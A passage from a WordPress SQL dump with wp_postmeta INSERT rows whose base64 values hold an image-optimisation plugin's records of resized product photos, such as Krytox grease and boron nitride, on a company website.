ZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWVsZWN0cm9uaWMtZ3JlYXNlLWVsZWN0cmljLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWVsZWN0cm9uaWMtZ3JlYXNlLWVsZWN0cmljLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LWVsZWN0cm9uaWMtZ3JlYXNlLWVsZWN0cmljLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1NTEsInRpbWUiOjE0ODM1NTEwNTQsImlkIjoxOTMzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1lbGVjdHJvbmljLWdyZWFzZS1lbGVjdHJpYy01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1lbGVjdHJvbmljLWdyZWFzZS1lbGVjdHJpYy01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1lbGVjdHJvbmljLWdyZWFzZS1lbGVjdHJpYy01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6NzgwLCJ0aW1lIjoxNDgzNTUxMDU4LCJpZCI6MTkzM30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1lbGVjdHJvbmljLWdyZWFzZS1lbGVjdHJpYy0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1lbGVjdHJvbmljLWdyZWFzZS1lbGVjdHJpYy0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1lbGVjdHJvbmljLWdyZWFzZS1lbGVjdHJpYy0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NzgwLCJ0aW1lIjoxNDgzNTUxMDYyLCJpZCI6MTkzM30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1lbGVjdHJvbmljLWdyZWFzZS1lbGVjdHJpYy00NTB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1lbGVjdHJvbmljLWdyZWFzZS1lbGVjdHJpYy00NTB4MzAwLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1lbGVjdHJvbmljLWdyZWFzZS1lbGVjdHJpYy00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MTEzMSwidGltZSI6MTQ4MzU1MTA2NSwiaWQiOjE5MzN9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (28966, 1932, 'wpfc_optimisation_reduction', '10361'); 
INSERT INTO `wp_postmeta` VALUES (28967, 1932, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvS3J5dG94LWVsZWN0cm9uaWMtZ3JlYXNlLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvS3J5dG94LWVsZWN0cm9uaWMtZ3JlYXNlLmpwZyIsIndpZHRoIjo2OTMxLCJoZWlnaHQiOjQ2MjUsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NTEwNzAsImlkIjoiMTkzMiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvS3J5dG94LWVsZWN0cm9uaWMtZ3JlYXNlLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvS3J5dG94LWVsZWN0cm9uaWMtZ3JlYXNlLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvS3J5dG94LWVsZWN0cm9uaWMtZ3JlYXNlLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo2NDUsInRpbWUiOjE0ODM1NTEwNzQsImlkIjoxOTMyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0tyeXRveC1lbGVjdHJvbmljLWdyZWFzZS04MDB4NTM0LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTM0LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0tyeXRveC1lbGVjdHJvbmljLWdyZWFzZS04MDB4NTM0LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0tyeXRveC1lbGVjdHJvbmljLWdyZWFzZS04MDB4NTM0LmpwZyIsInJlZHVjdGlvbiI6MTE1OCwidGltZSI6MTQ4MzU1MTA3OCwiaWQiOjE5MzJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvS3J5dG94LWVsZWN0cm9uaWMtZ3JlYXNlLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvS3J5dG94LWVsZWN0cm9uaWMtZ3JlYXNlLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvS3J5dG94LWVsZWN0cm9uaWMtZ3JlYXNlLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoxMDk4LCJ0aW1lIjoxNDgzNTUxMDgyLCJpZCI6MTkzMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9Lcnl0b3gtZWxlY3Ryb25pYy1ncmVhc2UtMTYwMHgxMDY4LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvS3J5dG94LWVsZWN0cm9uaWMtZ3JlYXNlLTE2MDB4MTA2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9Lcnl0b3gtZWxlY3Ryb25pYy1ncmVhc2UtMTYwMHgxMDY4LmpwZyIsInJlZHVjdGlvbiI6Mjg0NCwidGltZSI6MTQ4MzU1MTA4NiwiaWQiOjE5MzJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvS3J5dG94LWVsZWN0cm9uaWMtZ3JlYXNlLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvS3J5dG94LWVsZWN0cm9uaWMtZ3JlYXNlLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvS3J5dG94LWVsZWN0cm9uaWMtZ3JlYXNlLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1ODMsInRpbWUiOjE0ODM1NTEwOTAsImlkIjoxOTMyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0tyeXRveC1lbGVjdHJvbmljLWdyZWFzZS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0tyeXRveC1lbGVjdHJvbmljLWdyZWFzZS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0tyeXRveC1lbGVjdHJvbmljLWdyZWFzZS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NTExLCJ0aW1lIjoxNDgzNTUxMDkzLCJpZCI6MTkzMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9Lcnl0b3gtZWxlY3Ryb25pYy1ncmVhc2UtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9Lcnl0b3gtZWxlY3Ryb25pYy1ncmVhc2UtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9Lcnl0b3gtZWxlY3Ryb25pYy1ncmVhc2UtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjUzMiwidGltZSI6MTQ4MzU1MTA5NiwiaWQiOjE5MzJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvS3J5dG94LWVsZWN0cm9uaWMtZ3JlYXNlLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvS3J5dG94LWVsZWN0cm9uaWMtZ3JlYXNlLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvS3J5dG94LWVsZWN0cm9uaWMtZ3JlYXNlLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjo4NTUsInRpbWUiOjE0ODM1NTExMDAsImlkIjoxOTMyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvS3J5dG94LWVsZWN0cm9uaWMtZ3JlYXNlLTIyNXgzNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvS3J5dG94LWVsZWN0cm9uaWMtZ3JlYXNlLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvS3J5dG94LWVsZWN0cm9uaWMtZ3JlYXNlLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo4MzgsInRpbWUiOjE0ODM1NTExMDQsImlkIjoxOTMyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvS3J5dG94LWVsZWN0cm9uaWMtZ3JlYXNlLTQ1MHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvS3J5dG94LWVsZWN0cm9uaWMtZ3JlYXNlLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvS3J5dG94LWVsZWN0cm9uaWMtZ3JlYXNlLTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjoxMjk3LCJ0aW1lIjoxNDgzNTUxMTA4LCJpZCI6MTkzMn1d'); 
INSERT INTO `wp_postmeta` VALUES (28968, 1931, 'wpfc_optimisation_reduction', '11064'); 
INSERT INTO `wp_postmeta` VALUES (28969, 1931, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvQm9yb24tbml0cmlkZS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0Jvcm9uLW5pdHJpZGUuanBnIiwid2lkdGgiOjU0NzIsImhlaWdodCI6MzY0OCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU1MTExMiwiaWQiOiIxOTMxIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9Cb3Jvbi1uaXRyaWRlLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvQm9yb24tbml0cmlkZS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0Jvcm9uLW5pdHJpZGUtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjQ5OCwidGltZSI6MTQ4MzU1MTExNiwiaWQiOjE5MzF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvQm9yb24tbml0cmlkZS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0Jvcm9uLW5pdHJpZGUtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9Cb3Jvbi1uaXRyaWRlLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjo5ODIsInRpbWUiOjE0ODM1NTExMTksImlkIjoxOTMxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0Jvcm9uLW5pdHJpZGUtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9Cb3Jvbi1uaXRyaWRlLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvQm9yb24tbml0cmlkZS03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6OTI4LCJ0aW1lIjoxNDgzNTUxMTI1LCJpZCI6MTkzMX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9Cb3Jvbi1uaXRyaWRlLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0Jvcm9uLW5pdHJpZGUtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0Jvcm9uLW5pdHJpZGUtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6NTE5NiwidGltZSI6MTQ4MzU1MTEyOSwiaWQiOjE5MzF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvQm9yb24tbml0cmlkZS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0Jvcm9uLW5pdHJpZGUtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9Cb3Jvbi1uaXRyaWRlLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1MTQsInRpbWUiOjE0ODM1NTExMzMsImlkIjoxOTMxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0Jvcm9uLW5pdHJpZGUtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9Cb3Jvbi1uaXRyaWRlLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvQm9yb24tbml0cmlkZS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDUyLCJ0aW1lIjoxNDgzNTUxMTM2LCJpZCI6MTkzMX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9Cb3Jvbi1uaXRyaWRlLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvQm9yb24tbml0cmlkZS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0Jvcm9uLW5pdHJpZGUtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjQ1OCwidGltZSI6MTQ4MzU1MTEzOSwiaWQiOjE5MzF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvQm9yb24tbml0cmlkZS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0Jvcm9uLW5pdHJpZGUtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9Cb3Jvbi1uaXRyaWRlLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjo4MTYsInRpbWUiOjE0ODM1NTExNDMsImlkIjoxOTMxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvQm9yb24tbml0cmlkZS0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0Jvcm9uLW5pdHJpZGUtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9Cb3Jvbi1uaXRyaWRlLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo1OTMsInRpbWUiOjE0ODM1NTExNDYsImlkIjoxOTMxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvQm9yb24tbml0cmlkZS00NTB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0Jvcm9uLW5pdHJpZGUtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9Cb3Jvbi1uaXRyaWRlLTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjo2MjcsInRpbWUiOjE0ODM1NTExNTAsImlkIjoxOTMxfV0='); 
INSERT INTO `wp_postmeta` VALUES (28970, 1930, 'wpfc_optimisation_reduction', '9449'); 
